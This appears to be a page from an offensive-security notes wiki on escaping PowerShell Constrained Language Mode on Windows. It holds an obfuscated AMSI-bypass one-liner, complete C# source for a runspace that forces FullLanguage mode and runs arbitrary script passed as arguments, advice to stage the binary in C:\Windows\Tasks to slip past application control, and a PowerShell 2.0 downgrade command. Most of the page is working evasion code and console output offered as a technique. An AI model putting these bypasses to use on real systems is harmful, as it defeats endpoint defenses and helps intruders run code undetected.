PowerShell ConstrainedLanguage Mode, CLM

PS C:\Users\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

AMSI bypass blocked

PS C:\Users\> [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,!$false)
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').G ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

Bypass - Runspace

Visual Studio project -Console App (.NET Framework) template. Add a reference to the System.Management.Automation namespace:

Project > Add Reference...

C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ConstrainedLanguageExample
{
    internal class Program
    {
        static void Main(string[] args)
        {
            if (args.Length == 0) return;

            // Création du runspace avec le mode de langage défini explicitement à FullLanguage
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();

            // Définir explicitement le mode FullLanguage pour le runspace
            runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;

            // Créer un objet PowerShell pour exécuter les scripts
            PowerShell ps = PowerShell.Create();
            ps.Runspace = runspace;

            // Ajouter la commande PowerShell à exécuter
            ps.AddScript(String.Join(" ", args));

            // Exécuter la commande
            Collection<PSObject> results = ps.Invoke();

            // Afficher les résultats
            foreach (PSObject obj in results)
            {
                Console.WriteLine(obj.ToString());
            }

            runspace.Close();
        }
    }
}

User Access Control (UAC)

copy binary to C:\Windows\Tasks.

Same method as PowerPick but it is flagged by defender

Downgrading to PowerShell 2.0

Force a downgrade with the -version flag

powershell -version 2

PreviousLOLBAS / LOLDrivers / LOLESXi NextVBScript

Last updated 2 months ago

PS C:\Users\> [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,!$false) Cannot invoke method. Method invocation is supported only on core types in this language mode. At line:1 char:1 + [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').G ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage